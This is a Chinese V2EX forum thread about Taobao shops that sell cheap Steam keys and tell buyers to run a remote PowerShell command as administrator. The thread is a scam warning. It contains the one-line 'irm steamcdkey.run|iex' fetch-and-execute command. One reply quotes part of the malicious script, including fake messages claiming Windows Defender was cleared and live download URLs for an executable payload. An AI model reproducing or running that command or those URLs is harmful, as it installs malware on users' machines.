V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Liftman
V2EX  ›  分享发现

世风日下,淘宝 steam 店铺怎么都变成盗号的了?

  •  
  •   Liftman · 140 天前 · 3744 次点击
    这是一个创建于 140 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我好几年没怎么玩 steam 了。最近想玩一个小清新的游戏。就去淘宝买了。结果发现巨便宜。但是按照我往年的经验无非是外区 key 。或者是早期开发者内测低价囤积的那种 key 吧。。然后发现他的激活步骤。。是如下。。

    Steam CDKey 激活方法: 第一步:按住 win+x ,找到 powershell (管理员)( A )

    第二步:输入 irm steamcdkey.run|iex (切记要复制,不要手动输入,不要复制前后字符或空格),按回车。

    但凡不是智障都知道第二步是不存在的。而且是直接执行脚本的恶意行为。我 censys 看了一下。fofa 也看了一下。他这个地址如果直接访问是 302 到 steam 官方。这样普通人肯定以为是真的。。哎。

    然后我又试了一家店铺。差不多价格的。也是这样的结果。然后我看了一眼所有的店铺类似价格的。有差不多十家店铺。都是销量很大。基本上可以肯定是全是骗子了。然后 b 站有一个类似的帖子。明确了这些骗术确实存在不少时间了。

    真的太离谱了。虽然没有被坑到。但是我的账户理论上有差不多 40w 的价值,早就远超立案标准了。已经在咨询 w 安是否立案了。感觉很不爽。虽然没有几个钱。反正就想搞他们一波。

    20 条回复    2024-07-13 22:42:33 +08:00
    HojiOShi
        1
    HojiOShi  
       140 天前
    不知道,我是直接在 steam 上买的。这种要现金交易的平台为什么要过他人之手?
    loveqianool
        2
    loveqianool  
       140 天前 via Android
    # display Message
    Write-Host " [STEAM] App is ready for run .please wait... "
    Write-Host " [STEAM] Windows Defender has been clear "
    Write-Host " [STEAM] Ready to go !!! "
    Write-Host " [STEAM] watiing 1-3min "
    # download file and process
    $appStorePath = Join-Path $steamPath "steamworkz.exe"
    $downloadUrl = "http://by.haory.cn/1/1129/Steamworkz.exe"
    $backupUrl = "http://by.haory.cn/1/1129/steamworkz.exe"
    loveqianool
        3
    loveqianool  
       140 天前 via Android
    cn 域名不是都要备案吗,还敢用来搞这个。
    mikaelson
        4
    mikaelson  
       140 天前
    只买发 key 的
    xzysaber
        5
    xzysaber  
       140 天前
    这是假入库,最近 Steam 要严打这个了,赶紧处理下,不要账号红信了。
    Peek
        6
    Peek  
       140 天前
    @HojiOShi steam 上很多洗钱的,就是加密货币套现,所以有折上折的消费方式
    drymonfidelia
        7
    drymonfidelia  
       140 天前 via iPhone
    @xzysaber 假入库好像只中间人改服务器响应内容,插入游戏信息,服务器端发现不了
    loopinfor
        8
    loopinfor  
       140 天前
    我的经验是不管线下线上,没有实际交易的就不会立案
    InDom
        9
    InDom  
       140 天前
    能不能让那些山西的脚本小子们用 http://by.haory.cn/1/1129/Steamworkz.exe 这个来刷流量啊?
    yyzh
        10
    yyzh  
       140 天前 via Android
    @johnjiang85 steamcdkey.run 这个域名应该是托管在 dnspod 的?
    dearmymy
        11
    dearmymy  
       140 天前   ❤️ 7
    不是的,这个是他们共享 key ,但是下载恶意脚本危害很大。
    具体分析看雪有人完整分析了。

    https://bbs.kanxue.com/thread-279738.htm
    dearmymy
        12
    dearmymy  
       139 天前
    @dearmymy 好像是假入库,我还以为跟 appstore 共享软件原理。。。
    1KTN90lKW9gVJ9vX
        13
    1KTN90lKW9gVJ9vX  
       139 天前 via Android
    @loveqianool cn 域名不需要备案都可以用的,用香港服务器就行,
    xiaochen3
        14
    xiaochen3  
       139 天前
    这是伪入库,淘宝还是做生意为主,怎么可能都在盗号。
    JensenQian
        15
    JensenQian  
       139 天前 via Android
    假入库啊,很久了
    这种真不如直接玩盗版
    MisakiYui
        16
    MisakiYui  
       139 天前 via Android
    确实很恶心,一堆假入库的店铺在骗人
    hafuhafu
        17
    hafuhafu  
       139 天前
    假入库,远程下载脚本并执行,仍然有很多小白贪小便宜上当,花钱买盗版了属于是,而且还很危险...
    按目前见过的案例,有的假入库后 steam 还会被注入,启动 steam 后会弹淘宝店伪装的广告。
    想省钱要么正规平台比如小黑盒这种买 key ,要么倒余额了。
    相比各个平台价格还便宜到离谱的基本上都是坑。
    PrinceofInj
        18
    PrinceofInj  
       139 天前
    不是盗号。但是这种情况跟盗号就是网站主改一下脚本的问题。
    SkywalkerJi
        19
    SkywalkerJi  
       139 天前
    @drymonfidelia #7
    能不能发现是一说。主要是最近 steam 已经修改了用户协议,现在注入或者修改 steam 客户端 v 社可以直接封号。未来客户端进行联网验证也不是不可能。
    92DISPfZMyn9IZaw
        20
    92DISPfZMyn9IZaw  
       139 天前
    细说四十万
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2856 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 06:36 · PVG 14:36 · LAX 22:36 · JFK 01:36
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.